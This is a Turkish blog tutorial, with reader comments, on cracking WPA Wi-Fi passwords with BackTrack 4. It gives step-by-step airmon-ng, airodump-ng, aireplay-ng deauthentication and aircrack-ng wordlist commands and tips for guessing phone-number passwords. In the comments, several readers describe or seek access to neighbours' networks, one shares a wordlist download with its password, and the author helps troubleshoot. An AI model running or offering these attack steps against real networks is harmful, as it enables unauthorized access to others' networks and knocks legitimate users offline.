03.01.2011 – Düzenleme ve ekleme: WPA yakalayamıyorum diyenler için bir düzenleme ve ekleme yapma gereği duydum. Daha kesin olduğunu düşündüğüm bir yöntem yazıyorum. Lütfen yazıyı tekrar inceleyiniz. Düzenleme yaptığım yerleri yeşil ile yazdım. Teşekkürler.

Eski sitedeki yazımı düzenleyip tekrar yayınlıyorum. Bu yazıda BackTrack4 ile WPA şifrelerini kırmayı anlatacağım. Öncelikle ne yaptığımızdan bahsedeyim. Amacımız handshake adı verilen, modemle bağlantının kurulmasını sağlayan şifreli paketi yakalamak. WPA kırarken bir sürü paket toplamamız gerekmiyor. Bir tane handshake paketi ile kırabiliyoruz. Birinci aşama bu paketi yakalamak. İkinci aşama ise bu paketi elimizdeki şifrelerle karşılaştırmak. Bunun için elinizde satır satır şifrelerin olduğu bir metin dosyası gerekiyor. Diyelim ki elinizde 1’den 10’a kadar sayıların olduğu bir liste var. Benim şifrem 11 ise kıramassınız 🙁

Öncelikle buraya tıklayarak Backtrack 4 Final’i nasıl Windows ile beraber kullanabileceğinizi öğrenin. Ardından bilgisayarınızı Backtrack ile başlatın. Bahsettiğim yazıyı okumanız önemli. Çünkü bu yazıda Windows ve Backtrack’i nasıl birlikte kullanabileceğinizi ve masaüstü arayüzüne geçişte karşılaşabileceğiniz sorunları anlattım. Lütfen biraz zamanınızı ayırıp ordaki yazıyı okuyun. Böylece aşağıdaki işlemlerde bir sorunla karşılaşmazsınız.

Bu yazıdan önce WEP şifrelerini kırma hakkındayı yazıyı okursanız iyi olur. Çünkü dinleme moduna almayı, Backtrack 4’ü başlatmayı, açılışta çıkabilecek sorunları orada anlattım. Bu yazıda biraz hızlı geçebilirim.

Birinci konuya geri dönelim. Handshake yakalamak için biz paket dinlerken modeme başkasının bağlantı kurması gerekir. Böylece o sırada yollanan handshake paketini yakalayabiliriz.

  1. Eğer dinlediğimiz ağda kimse yoksa sadece birisinin bağlanmasını bekleyeceğiz.
  2. Biz ağı dinlemeye başladığımızda zaten birileri varsa bu kişilerin bağlantısını kopartıp tekrar bağlanmalarını sağlayacağız. Böylece tekrar şifreli paket göndermeleri gerekecek.

Ben, bu yazımda her iki durumuda göstereceğim. İlk önce birinci durum:

NOT:
Bu şekilde yazdıklarım Linux komutları
Bu şekilde yazdıklarım ağdan düşüreceğimiz kişinin MAC adresi
Bu şekilde yazdıklarım şifresini kıracağınız modemin MAC adresi

 

Backtrack’ı açın ve masaüstüne gelin. Bir konsol penceresi açarak diğer yazıdaki gibi kartınızı dinleme moduna alın: airmon-ng start wlan0
Sonra airodump-ng -c 11 mon0 komutuyla etraftaki ağları bulun ve kırmak istediğinizin BSSID adresini not edin.
-c 11 parametresi sizin kıracağınız ağın hangi kanaldan yayın yaptığını belirtir. Eğer modem farklı bir kanaldan yayın yapıyorsa (örneğin 6 ya da 10) bu parametreyi -c 6 yada -c 10 olarak değiştirmeniz gerekebilir.

En son olarak WEP kırmak için yazdığımız komutu yazıp o ağı dinlemeye başlayın:
airodump-ng -c 11 --bssid 00:18:39:2b:4c:98 -w wpadeneme mon0

Üstteki komutta --ivs parametresi olmayacak. Bu yüzden çıkarttım.

airodump-ng -c 11 --bssid 00:18:39:2b:4c:98 --ivs -w wpadeneme mon0

Sadece birisinin bağlanmasını bekliyoruz…

Hemen yakaladık. Sağ üstte WPA handshake yazısını gördüğümüzde CTRL+C tuşuyla dinlemeyi sonlandırıyoruz. Ve sayfanın en altındaki kırma bölümüne bakıyoruz. WPA Handshake yazısını göremezseniz problem değil. Bazen yakalamış olduğu halde yazmayabiliyor.


Şimdide, eğer biz dinlemeye başladığımızda ağda birileri varsa ne yapacağımızı anlatacağım.
Dinlediğimiz pencere bir kenarda dursun. Biz başka bir konsol açıp şu komutu yazalım:
aireplay-ng --deauth 1 -a 00:18:39:2b:4c:98 -c 00:21:6b:3e:14:c2 mon0

Eskiden 0 olan yeri 1 olarak değiştirdim. Bir kere paket göndermeniz yeterli oluyor. İsterseniz 0 olarak kalabilir. Problem değil.

Mavi yazdığım yere o sırada bağlı bulunan bir bilgisayarın (STATION sütunundakiler bağlı olan bilgisayarların MAC adresleridir) adresini yazacaksınız.

aireplay-ng --deauth 0 -a 00:18:39:2b:4c:98 -c 00:21:6b:3e:14:c2 mon0

Yazdıktan sonra görüldüğü gibi o bilgisayarı ağdan düşürmek için paketler gönderiliyor. Bu sırada paketleri topladığımız pencereye dikkat edin. Sağ üstte WPA handshake yazısı çıkması gerekli değil.

Handshake yakaladığınız halde paketleri topladığınız pencerede gözükmeyebilir. Zaten çoğu kişi burada problem yaşıyor. Görünmesin önemli değil. Çünkü aircrack-ng ile şifreleri kırmaya başladığımızda içinde handshake var mı yok mu bize söylüyor. Yoksa zaten kırmaz.

Bakın sağ üst köşede paketin yakalandığı belirtildi. Şimdi iki pencerede de CTRL+C yapıp olayları durdurun ve birisini kapatın. Çünkü diğeriyle şifreyi kırmaya çalışacağız.


Kırma işleminden önce elinizde bir şifre listesi olmalı. Öncelikle bunu belirteyim. Ben bir txt dosyasına alt alta 4 satır rastgele birşeyler yazdım. Bir satıra da kendi kullandığım şifremi yazdım bu anlatım için. Sizin elinizdeki listede kıracağınız modemin şifresi yoksa bu iş olmaz. Tekrar ediyorum elinizdeki listede olmazsa kıramazsınız.
aircrack-ng -a 2 wpadeneme-01.cap -w keyler.txt
-a 2      : WPA şifresi kırılacağını belirtiyor
wpadeneme-01.cap : Paketleri topladığımız dosya
-w keyler.txt      : Şifrelerin olduğu liste dosyası

Alttaki resimde dosynın uzantısı .ivs yazıyor fakat üstte yazdığım gibi .cap olacak. Elinizdeki dosyada handshake olup olmadığını görmek için aircrack-ng wpadeneme-01.cap komutunu yazabilirsiniz. Bu komutu yazıp çalıştırdıktan sonra karşınıza aircrack-ng programının ilk ekranı gelecek. Bu ekranda elinizdeki dosyada handshake olup olmadığını gösteriyor.

Alttaki örnek bir resim. Kırmzıyle işaretlediğim gibi görüyorsanız handshake yakalamışsınızdır.

Kısaca özet geçeyim:

  • airodump-ng ile paketleri topluyoruz
  • aireplay-ng –deauth…   ile ağdaki kişiyi düşürüyoruz
  • aircrack-ng dosyaadi-01.cap yazarak handshake yakaladık mı kontrol ediyoruz.

Tekrar, tekrar söylüyorum: Elinizde wordlist olması gerekiyor ya da elcomsoft’un Wireless Security Auditor adlı programı ile ekran kartının işlemcisini kullanarak şifre denemesi yapabiliyormuşsunuz. Bu olayı denemedim.

Yorumlarda burak’ın dediği Beini’yi bende kullanıyorum. Gayet güzel bir sistem. Fırsatım olduğunda bununda kullanımını anlatacağım.


Sonuç olarak böyle kırılıyor şifreler. İnternette 9-10 GB’lık wordlistler bulabilirsiniz. Ama hepsi yabancı sözcükler olduğu için Türkiyedeki şifreler tutar mı bilemem. Genellikle insanlar telefon numaralarını yazabiliyorlar. 2121234567 yada 5371234567 (evet türkcell kullanıyorum :p) gibi. Bir wordlist programıyla 0000000000’dan 9999999999’a kadar olan tüm sayıların olduğu bir liste hazırlarsanız belki tutar. Benim yorumum: WPA ile uğraşmayın.
Şifre olarak 12345678 deneyin. Olursa kullanın, olmassa kullanmayın 🙂

En son yapmamız gereken bir işlem kaldı: Bilgisayarınızı yeniden başlatıp Windows’a geçin, şifreyi yazın ve bağlanın.
Şifreyi bulduğunuz pencerete reboot yazıp enter’a basarsanız yeniden başlatabilirsiniz.

552 Yorum

  1. #1 Funda tarafından, tarihinde

    bt4 ile şifre kırmak oldukça zevkli ve kolay(WEP şifreleri). WPA denememiştim, güzel olmuş bu paylaşım.. :))

  2. #2 Ali tarafından, tarihinde

    Bruteforcedan farki neki bunun 😀

  3. #3 Murat tarafından, tarihinde

    @Ali
    Yaptığımız şey zaten bruteforce. Ben başka birşey yapıyoruz demedim ki yazıda.

    • #4 tık tık tık! tarafından, tarihinde

      Anlarsa Ekim’e kadar, anlamazsa… :))

  4. #5 alkan tarafından, tarihinde

    arkadaşım yararlı bir paylaşım olmuş.şunu merak ediyorum.
    – bu wordlistler bt programı içinde var mı?varsa yukarıda yazdığın komudu yazınca mı ortaya çıkacak?
    -mesela ben wordlist bulsam usbye atsam onu nasıl kullanabilirim bt programı usb yi görür mü?
    -bende var olan wordlistleri bt programnda nasıl kullanırım?

    ilgine şimdiden teşekkür ederim

  5. #6 trk tarafından, tarihinde

    arkadaşlar benim data hiç artmıyor wpa da nedeni ne olabilir.wep de artıyor??????????

    • #7 Murat tarafından, tarihinde

      WPA’da datanın artmasının bir önemi yok. Handshake yakalamanız yeterli.

      • #8 tülin tarafından, tarihinde

        muratcım bana yardımcı olabilirmsin bu konuda ben hiç birşey bilmiyorum.. ben adanadan tülinn

        • #9 Murat Çeşmecioğlu tarafından, tarihinde

          Anlatılanlardan hangisinde sorun yaşadığını belirtmemişsiniz.

  6. #10 trk tarafından, tarihinde

    hiç handshake de yakalamıor laptop bi anormallik var netden bakıorm bütn anlatımlarda data artıor bi sorn olmalı yeteri kadar beklememe rağmen hiç kıramıorm
    yrdımcı olursanız sevinirim

  7. #11 amemo tarafından, tarihinde

    benim de int yoktu bi kablosuz ağ arayım dedim aradım buldum şifreye 123456789denedim tuttu şuan intteyim :d ne ballıyım ama ha

  8. #12 mehmet ali tarafından, tarihinde

    merhaba hocam ,
    bnde alkan kardşin sorduğu soruyu merak ediyorum
    tşkler ,
    iyi çalışmlar.

  9. #13 Murat tarafından, tarihinde

    @alkan
    wordlist’ler backtrack içinde yok. dışarıdan indirip kullanmanız gerekiyor. usb’ye atıp kullanabilirsiniz. işletim sistemi gibi çalıştığı için usb,harici harddisk gibi birimlere erişebilirsiniz.
    Backtrack açıkken flashdiski taktığınızda XP’de olduğu gibi bir pencere gelecek.
    Örneğin benim flashdiskimin adı “yedek”. İçindeki dosyayı kullanırken
    aircrack-ng -a 2 wpadeneme-01.ivs -w /media/yedek/wordlist.txt
    yazmam gerekir.

    Flashdisk’inizin yerini bilmiyorsanız bir konsol açıp
    ls /media yazabilirsiniz. Orada çıkması gerek.

  10. #16 RooTWorM tarafından, tarihinde

    Güzel anlatım fakat WPA ile uğraşmak pek iyi bir fikir değil 🙂
    WEP kırmak en güzeli (varsa tabi :))

  11. #17 mutlu tarafından, tarihinde

    hocam benim airodump-ng -c 11 mon0 da kontrol etmiyor (no such divice) diyor nedeni ne olabilir?

    • #18 Murat tarafından, tarihinde

      Öncesinde airomon-ng start wlan0 komutuyla kartınızı monitör moduna aldınız mı?

  12. #19 barış tarafından, tarihinde

    @trk
    selam TRK aynı sorun bendede var yanı bendede handshake yakalıyamıyorum çözüm buldummu veya bulan bi arkadaş olursa yardımcı olursa gerçekten çok sevınırım şimdiden teşekkürler…. cihangir___@hotmail.com @trk

  13. #20 melih emre tarafından, tarihinde

    Birinin ağa girdiğini nasıl anlayacağız?

    • #21 Murat tarafından, tarihinde

      airodump-ng ile paket kayıt ederken alt taraftaki bölümde çıkan liste ağdaki bilgisayarları gösterir. Oradan takip edebilirsiniz.

  14. #22 barış tarafından, tarihinde

    ya murat usta sağol çok guzel bılgıler verıyorsun bide şu yorumlara bı cevap yazsan bı yardımcı olsan çok daha guzel olmazmı…..

    • #23 Murat tarafından, tarihinde

      Ne zamandır uğraşamıyordum. Bu hafta blogu güncelleme ve tema ile uğraştım. Sizde haklısınız.
      Handshake için ağda birilerinin olması gerekli. Ayrıca o kişileri ağdan düşürüp tekrar bağlanmasını sağlamalısınız. Bu işlemde anlattığım aireplay-ng --deauth 0 -a 00:18:39:2b:4c:98 -c 00:21:6b:3e:14:c2 mon0 komutuyla yapılıyor. Bir kaç kere denemeniz gerekebilir.
      Bu işte gerçekten çok değişken var. Modemden bile kaynaklı olabilir. Handshake yakalasanız bile elinizdeki wordlist’te doğru şifre olmayabilir.
      O yüzden WPA ile uğraşmak yerine etrafta WEP varsa kırmayı deneyin. Ben WPA’lara elimi bile sürmüyorum. Elimde wordlist dahi yok 🙂
      Kolay gelsin. Umarım başarılı olursunuz.

  15. #24 barış tarafından, tarihinde

    ya abıcım sağolasında artık wep kullanan pek yok bılmıyorum hanı acaba eskı modemlermı kullanıyor wep i de çevremde pek wep ile şifrelenmiş modem yok

    • #25 Murat tarafından, tarihinde

      Sadece eski modemlerde değil, yeni modemlerde de kullanılıyor hala. Benim modemim WEP, WPA ve WPA2 destekliyor. Anlatımlarda hep kendi modemimi kullanıyorum. Fakat eski bir teknoloji olduğu doğru.
      Artık insanlar akıllanmaya başladı. Modem ayarlarından WPA’yı seçiyorlar.

  16. #26 ibRahim tarafından, tarihinde

    İlk yorumu yapan fundaya söylüyorumİ;
    o kadar kolay değil linuxta wpa şifre kırmak.Üstelik bunu denemeden konuşuyorsun.Bir dene istersen sen airodum u zor bulursun backtrackta.Karmakarışık.Her yerde aynı anlatım var ve hepsi saçma

  17. #27 yunusselvi tarafından, tarihinde

    file 15:file not found hatası aldm

    • #28 Murat tarafından, tarihinde

      Hangi işlem sırasında aldınız bu hatayı?

  18. #29 Yılmaz ERDOGAN tarafından, tarihinde

    Hocam bi de şu programın setup link ini verseniz pek güzel olur. Teşekkürler.

  19. #30 sebelebettinkam tarafından, tarihinde

    Hocam anlatımın çok iyi bence ufak tefek şeyler dışında herkes çok rahat ilk bakışta anlar.
    Ancak benim sorum var. Ağları dinlerken hani, ya birinin bağlanmasını bekliyorduk yada biri varsa bağlantıyı kesip tekrar bağlanmasını sağlamaya çalışıyorduk ya

    İşte orada sorum şu bağlanmasını beklediğimiz kişi benim anladığım kadarıyla mecburen wirelesstenmi bağlanması gerekiyor kabloludan bağlansa olmaz değilmi

    Cevabını bekliyorum Teşekkürler

    • #31 Murat tarafından, tarihinde

      Modeme kabloludan bağlanırken şifre sormuyor, fakat biz kablosuz ağ için uğraşıyoruz. Bu durumda kabloludan bağlanan kişinin bize bir faydası olmaz 🙂

  20. #32 alkolikcihan tarafından, tarihinde

    acaba şu keyler.txt dosyasını nereden buluruz böyle yüklü bir sürü kombinasyonun olduğu

    • #33 Murat tarafından, tarihinde

      keyler.txt’yi sizde yapabilirsiniz. En basit haliyle not defterini açıp her satıra olabilecek şifreleri yazın ve kayıt edin.
      İnternetten istediğiniz sayı-harf kombinasyonlarını üreten programlar mevcut.

  21. #34 alkolikcihan tarafından, tarihinde

    birde şu handshake yazan yerde bir türlü bişi çıkmıyor sabahtır bekliyorum 1 saati geçti acaba evde yoklarda bağlanmıyorlarmı

  22. #35 zülküf tarafından, tarihinde

    yaw babam ben onu bunu bilmem 2 yıldır bunun üzerinde çalışıyorum tam kırma anına geliyorum hep bi sorun yaşıyorum bence de bunu hekırlardan başka kimse kıramaz diyorum kıranda çıksın karşıma video atıp göstersin ha sakın yanlış anlamayın wep şifreleme kırılır o kolay bana wpa yı gösterin kıran şimdiye kadar yok yalnız girip internete paylaşıyorlar yok bu böyledir yok böyledir boş laflar bunlar çıkıp bi baba yigit bana e-posta versin desin ben kırmışım bakayım banada ögretsin wpa bide wpa2 yi bakalım? kolay gele…..

  23. #36 burak tarafından, tarihinde

    Harbiden delirecem çok az kaldı.7 yıldır çevremdeki kişilerin internetlerinden yararlanıyorum.ama sadece sınırsız olanlarından.gel gelelim herkes akıllandı wep şifreleme kullanan yok.dedim ki illaki wpa deneyelim.wordlist oluşturdum bölemiyorum.hadi onu halletsem gariptir Beini işletim sisteminde handshake yakalıyorum kaydedemiyorum.backtrack 3-4 de denemeler yapıyorum handshake yakalamıyor kafayı yiyecem netsizim 3G sağolsun idare ediyorum ama oda olmuyor.sizce neden olabilir backtrackde neden handshake yakalayamıyorum?pcı kartım var airlive pcı2200 yani rt61 chipset kullanıyor destekliyor.bir sorun yok wep sürekli kırıyorum bi yardım….

  24. #37 burak tarafından, tarihinde

    Arkadaşlar Beini işletim sistemini deneyin backtrack gibi ancak komut muhabbgeti yok süper birşey şiddetle tavsiye ediyorum =))

  25. #38 zülküf tarafından, tarihinde

    murat sana diyorum bu hanshake yi nasıl yakalıyayım backtrack ta dedigin yere kadar geldim fakat bu handshake nasıl yakalanır bir bilgi ver bağlanan ağı ağdan düşürüyorum fakat yakalayamıyorum burak bide senin dedigin işletim sistemi nasıl programlar üzerinden mi kırılıyor komutsuz

    • #39 Murat tarafından, tarihinde

      Öncelikle; “murat sana diyorum” derken?

      mon0 olması demek kartınızı kullanarak yakaladığınız paketleri inceleyebilecek durumda olması demektir. En basit açıklaması sanırım bu.
      Bu yüzden wlan0’da da paketleri görebilirsiniz fakat handshake yakalayamıyor olabilirsiniz.

      Umarım asıl demek istediğimi anlamışsınızdır.

  26. #40 zülküf tarafından, tarihinde

    benim anlamadığım wla0 monitör moduna alınca ne oluyor. mon0 ne oluyorsa wlan0 da da oluyor murat

  27. #41 zülküf tarafından, tarihinde

    e tmm ”murat sana duyorum lafını yanlış anladım sanırım ben sana yazayım diye belli olsun diye o cümleyi yazdım bu lafımdan rahatsız oldunsa k.b özür dilerim”
    şimdi wlan0 ile paket yakalayamayız yani hanshake ama monitör modunda da yakalıyamıyoruz dedigin yere kadar geldim aireplay-ng –deauth 0 -a FF:FF:FF:FF:FF:FF -c FF:FF:FF:FF:FF:FF mon0 komutunu da yaptım yine olmadı. sorun ne ne yapiyorum bağlı kişi ağdan düşmüyor kısacası murat bu wpa2 nasıl kırılır şu an be wep i kırdım evden konuşuyorum çok güzel bişey bide bu wpa yı söylesen handshake yakalamak nasıl olur bi ögretsen. şimdiden yardımın için teşekürler.kolay g.

  28. #42 zülküf tarafından, tarihinde

    burak” beini işletmeside boş en sağlamı backtrack 3 ve 4 kullanın ğişman olmassız kafanız yorulacak ama ben 1 ayda ögrendim backtrackın4’ün içini

    • #43 mehmet tarafından, tarihinde

      Şu işi gelip bana öğretecek arkadaşa helalinden 30-40 tl lik kontör vericem.wpa şifresini kırmak imkansız gibi.Hala kırmış gibi yapıp hava atan arkadaşlar var.Mail adresim orada.Gelin görüşelim.

  29. #44 arif tarafından, tarihinde

    hocam merhaba, bu wpa’ları kırarken şifrelerden oluşan bir wordlist olsun elinizde demişsiniz, anlamadığım, elimde o modemin şifresi olduktan sonra kırmaya uğraşmam ki, sanırım benim anladığım yanlış gibi. Aydınlatırsanız sevinirim iyi çalışmalar..

    • #45 Murat tarafından, tarihinde

      Elinizdeki wordlist dediğim şey; içinde olabilecek tüm şifrelerin olduğu bir yazı dosyası. Fakat bu şifreler modemin değil, kablosuz ağın giriş şifreleri. Yaptığımız işlem ise bu şifreleri sırayla deneyerek kablosuz ağın şifresini bulmak.

  30. #46 zülküf tarafından, tarihinde

    arif sen bu wordlist leri internetten bak yada kendin hazırlayabilirsin aklına gelebilecek bütün şifreli kombinasyonlar wordlistin içindedir bu wordlisti aircrack ile çalıştırdığında o wordlistin içindeki şifreleri deneyip bulacaktır yalnız eger senin wordlistinde o modemin şifresi yoksa birşey yapamazsın worlisti kendinde yapabilirsin veya internetten küçük bi araştırmayla wordlistler bulabilirsin….
    keşke sorunum wordlist olsaydı hemen kırardım ama 2 hafta dır handshake yakalıyamıyorum şu an netteyim web’ i kırdım ama uzak olduğu için arada bir bağlantım kesiliyor ama idare ediyoruz sinyali iyi olanlarda hepsi wpa onun için şimdide wpa üzerinde çalışıyorum ha bi de size birşey söylicem hepinize bu webi siz nasıl kırıyorsunuz helebi söyleyin… nasıl biliyorsunuz…

  31. #47 zülküf tarafından, tarihinde

    birde birçoğu kişi webin kırılacağını bile bilmiyor çoğu paket topluyor web te web i kırınca paket toplamaya gerek yok bilmeyen varsa gelsin

  32. #48 Lullaby-01 tarafından, tarihinde

    arkadaşlar woldlist sini ben nasıl indireceğim bana söylerseniz sevinirim teşekkür ederim ben baya hand shake yakalıyorum woldlist si olmayınca kıramıyorum bana lütfen yardımcı olursanız çook sevinir

  33. #49 Lullaby-01 tarafından, tarihinde

    nerden kolay bir şekilde indirebilirim veya kendim numaraları nasıl yapabilirim

  34. #50 Murat tarafından, tarihinde

    “WPA Yakalayamıyorum” diyenler için biraz daha farklı bir yöntem vereceğim birazdan.
    DÜZENLEME: Yorum kısmından değil, üstteki yazıyı değiştirmek daha mantıklı. Sonradan bulacaklar için yararlı olur. Üstteki yazıda düzenleme yaptığım yerden itibaren tekrar okursanız güzel olur.

  35. #51 zülküf tarafından, tarihinde

    lullaby-01” kendin yapamassın yapsanda yani çok zor yapılıyor bende iki saattir internetten arama yapıyorum fakat bulamadım iyi bir wordlist arkadaşlar elinizde bir wordlist varsa paylaşın lütfen yardımlarınız için şimdiden teşekkürler

  36. #52 Lullaby-01 tarafından, tarihinde

    Arkadaşlar elinizde worldlist olan varsa paylaşırsa, sevinirim

  37. #53 zülküf tarafından, tarihinde

    beyler artık bunu bir açığa kavuşturalım yav wordlist ve handshake sorununu halleden yokmu yav

    • #54 Murat tarafından, tarihinde

      Düzenlediğim hali işine yaramadı mı?

      • #55 zülküf tarafından, tarihinde

        hayır yaramadı ne yapıyorum yakalıyamıyorum handshake

        • #56 Murat tarafından, tarihinde

          Birisini ağdan düşürdükten sonra aircrack ile o dosyayı kontrol ediyorsun ve 0 handshake mi yazıyor?
          airodump komutundan --ivs parametresini sildin mi?
          aircrack kullanırken dosyanın uzantısını .cap olarak gösteriyorsun değil mi?

          Başka bir bildiğin ağda denemeler yaptın mı? Örneğin ben anlatımlarımda kendi modemimi kullanıyorum. Senin yada bir arkadaşının modeminde deneyebilirsin. Belkide senin sorunun modemden kaynaklıdır.

  38. #57 Lullaby-01 tarafından, tarihinde

    ya şu wordlist olan varsa arkadaşlar verirseniz çok sevinirim haber bekliyom

  39. #58 süleyman tarafından, tarihinde

    1 dakikada veya 15 dakika da kırılan wpa hakkında bilginiz var mı?

  40. #59 Lullaby-01 tarafından, tarihinde

    var

  41. #60 Lullaby-01 tarafından, tarihinde

    yani kimse de worldlist si yokmu arkadaşlar

    • #61 Murat tarafından, tarihinde

      Bende yok. Şimdiye kadar olan birileri olsaydı çıkardı eminim. Google’da arama yaptın mı “wpa wordlist” yazarak?
      Bir çok sonuç çıkıyor. Onlardan eline birşey geçmedi mi?

  42. #62 Nostra tarafından, tarihinde

    aranilan ve aradiginiz wordlist 65MB
    Açılınca 9 GB

    Wordlist

    http://rapidshare.com/files/244187200/wordlist.rar

    rar sifresi: [sourcecode language=”css” autolinks=”false” gutter=”false”]www . wifi-turk . com[/sourcecode]

    Düzenleme: Aradaki boşluklar olmadan yazın. WordPress linkleri çevirdiği için başına http:// ekliyor. Böyle yazmaktan başka çare yok.

    • #63 yclplt tarafından, tarihinde

      rar şifresi yanlış diyo .

  43. #64 xGoYax tarafından, tarihinde

    http://murat.cesmecioglu.net/wp-content/uploads/2010/05/aircrackwpa.jpg

    bu resimdeki gibi ekran geliyor ama şifreyi nerden bulacağımı anlamadım baya bir uğraştım farklı kodlar falan bulamadım

    • #65 Murat tarafından, tarihinde

      aircrack-ng -a 2 wpadeneme-01.cap -w keyler.txt komutuyla elinizdeki wordlist ile kırmaya başlayacaksınız. Resimdeki ekranı görüyorsanız handshake yakalamışsınız demektir. Geriye wordlist ile deneme yanılma yaparak şifreyi kırmak kalıyor.

  44. #66 xGoYax tarafından, tarihinde

    backtrack 4’ün içinde wordlist olmuyor peki ??

  45. #67 xGoYax tarafından, tarihinde

    backtrack 4’ün içinde wordlist olmuyor mu peki ?? dicektim

  46. #68 murat tarafından, tarihinde

    herkes demişki wep kırmak kolay wap zor diye.ben bikaçgündür ilgileniyorum bu konuyla ama bi arpa yol alamadım.ya adaptör olmuyor yada ben bi yerde yanlış yapıyorum.bende airties 2310 marka 802.11n usb adaptör var.çipset ne bilmiyorum.ama win de çalışan airdumplarda kart uyumsuz diyor.back track 4 indirdim kafeden açtım.iwconfig komutuyla baktım arabirim ra0..bununla komutları denedim ama dinleme yaparken bişey çıkmıyor.burda tc emniyet yazan satırda hiç ağ çıkmıyor.bi süre sonra anca onun 2 satır altında 1 tane çıkıyor oda fazla durmuyor boyna gidip geliyor.onunda mac adresini alıp aynen burdaki gibi bir komutla paketleri toplaya başlıyorum ama o mac adresi çıkmıyor pencerede.çıksa bile data yazan yer hep sıfır.packets kısmı arada bi 1 er 1 er artıyor ama data kısmında bi gelişme yok.misal bütün 11. kanaldaki paketleri kaydet komu girsem ondada aynı sorun.data yok packet 1-2 artıyor.win de bakıyorum etrafta 10 tane wep şifreli ağ var ama backtrack de doğru düzgün göremiyor bile

    • #69 Murat tarafından, tarihinde

      Kartınız uyumsuz olabilir.

  47. #70 murat tarafından, tarihinde

    kartın uyumsuz oldunu win de airdump açtığımda bende farkettim.back track te de uyumsuz deyip hiçbir dinleme komutunu kabul etmemesi gerekir.dinleme yapıyor arada bir bir iki tane ağ paketini sayıyor.data kısmında bişey yok sadece.bu modele uygun bir patch driver varmıdır varsa nerden bulurum hocam

  48. #71 Musti tarafından, tarihinde

    ya ben wpa yakaladım kırdım da gerçi “00000000” mişde neyse şifreyi yazıp bağlan dediğimde bağlanmıyor bi türlü olmadı hatta değiştirmiştir belki diye 2. kez yakalyıp kırdım yine olmadı bi bilgisi olan var mı acaba? “AIRTIES_RT 205 ağ da bu”

  49. #72 mehmet tarafından, tarihinde

    Musti kardeş İstanbul da oturuyorsan gel şu işi bana öğret.Ne kadar uğraştıysam yapamadım.1 aylık kontörün benden.Mail adresim : fmsapoglu@hotmail.com

    • #73 Murat tarafından, tarihinde

      Dünyanın en güzel şehri olan İstanbul’da oturuyorum 🙂 Kontör için teşekkür ederim fakat faturalı hat kullanıyorum 😀

      Yapamadığın, takıldığın yer neresi ise buraya yazarsan çözmeye çalışalım hep birlikte.

    • #74 Musti tarafından, tarihinde

      ya ben linux ortamında yakalayıp deniyorum windows da nasıl yapılır bilmem ama yukarda blacktrack kurulumu verilmiş ordan bi bak olmazsa google amcayı kurcala biraz, zor olmıcaktır..Kolay gelsin..

      Daha önce yazdığım konu hakkında bilgisi olan var mı acaba? Teşekkürler…

  50. #75 ismail tarafından, tarihinde

    Bu wordlisti nasıl yapcaz war bnde bi tanede oraya kadar qeldm ondan sonrasını yapamadm resimli bi şeklde anlata blrmsn rica etsem şimdiden tesekkürler

    • #76 Murat tarafından, tarihinde

      Elinizde wordlist var mı? Yoksa kendiniz yazarak bir wordlist mi oluşturmak istiyorsunuz?

      • #77 muhsin tarafından, tarihinde

        benm elmde bir wordlist var.bunu nerye koycaz nasıl göstercez yardımcı olumusunuz lütfen.

      • #78 Hidayet DEMİR tarafından, tarihinde

        Ben wpa şifresini kırdım ama sizin yöntemlerinizle değil şu anda takır tıkır onu kullanıyorum birde harici usb güçlendirici aldım valla mütiş ötesi bir durum ….

        • #79 Murat Çeşmecioğlu tarafından, tarihinde

          🙂 Öncelikle hayırlı olsun.
          Yönteminizi bizimle paylaşabilirseniz bize de yolgösterici olursunuz.

  51. #80 erhan tarafından, tarihinde

    ben parduste yazayım deneyeyim dedim komutu görmüyor?

    • #81 Murat tarafından, tarihinde

      Pardus’ta aircrack-ng paketi yüklü olarak gelmiyor olabilir. PiSi’den (sanırım pardus’un paket yükleyici programı PiSi idi) bulup yükleyebilirsiniz.

      • #82 erhan tarafından, tarihinde

        ewt paket yöneticisinede baktım arattım ordada yok bulmuyor

  52. #83 erhan tarafından, tarihinde

    ben pardus kullanıyorum ama ben adobe cs3 te kullanmam gerekiyor sanal makine kurdum ama cs3 1 gb ram 1 gb ekran kartı istedigi için sanal makineye kuramıyorum sanal makineyide büyütemiyorum+ wine programı kurdum ama ondada hata veriyor yardımcı olursanız sevinirim çift işletim sistemi kurmak pc için iyi olmaz diye düşünüyorum.

  53. #84 onuralpap tarafından, tarihinde

    airman-ng start wlan0 komutu olmuyor birçok kez denedim yapamadım maglesef

    • #85 Murat tarafından, tarihinde

      airman-ng değil airmon-ng olması gerekiyor.

  54. #86 hakan tarafından, tarihinde

    merhaba ben wep sifresi nasil kirabilirim yardimci olursaniz sevinirim hic denemedim bilmiyorum ne yapmam gerek acaba ? acil yardim simdiden tesekkürler…

  55. #88 barcin tarafından, tarihinde

    elimde keylist var yeterli usb alanımda yok bunun için bunu hddmin içinden çalışan cd linuxte (bt4) göstertmek istiyorum ama başaramıyorum. Bu konuda yardımcı olurmusunuz ?

  56. #89 barcin tarafından, tarihinde

    bt4 te wpa için keylisti göstertemiyorum usb flash belleği göremiyorum. yada hddnin içerisindeki 1 dosyayı yardım edin lütfen xd

  57. #90 erol tarafından, tarihinde

    bugün 22/02/2011. bu tarihe yakın tarihte yukarıdaki programı yükleyerek ve arama yaparak, şifre kırabilen var mı arkadaşlar…. ?

    • #91 Murat tarafından, tarihinde

      Bugün 22.02.2011, ben Murat 🙂
      Hep derdim WPA şifreleme sistemi bir gün kırılabilecek mi, yapan olmadı 🙂
      Şaka bi yana WPA gerçekten zor bir şifreleme sistemi. Elinizde uygun bir wordlist olmadıktan sonra kırabilmeniz zor ne yazıkki.

  58. #92 alpagu tarafından, tarihinde

    Pardus 2011 kullanıyorum benim şifre kırabilmem için gerekli olan aşamalar neresi acaba ? sistemime bir kaç proğram yükleyerek kırabilecek bir sistem elde edemez miyim ? Şuan cep telefonumu modem olarak göstererek internete edge ile giriyorum ve ancak 15 kb ile BackTrack4 indirmem mümkün gözükmüyor. Sayfanızı takipteyim cevap verirseniz memnun olurum.

    • #93 Murat tarafından, tarihinde

      Pardus için hatırladığım kadarıyla paket yöneticisinde aircack’in yükleme paketi var. Oradan yükleyip anlatımları takip ederek kırabilirsiniz.

  59. #94 İsmini Vermek İstemeyen Ziyaretçi tarafından, tarihinde

    *** çocukları sizin gibiler yüzünden kaplumbağa gibi net hızım bi film bile indirilmiyo.Kaç defa şifre deiştim yine kırdılar.Lan sizi bi yakalasam varya……

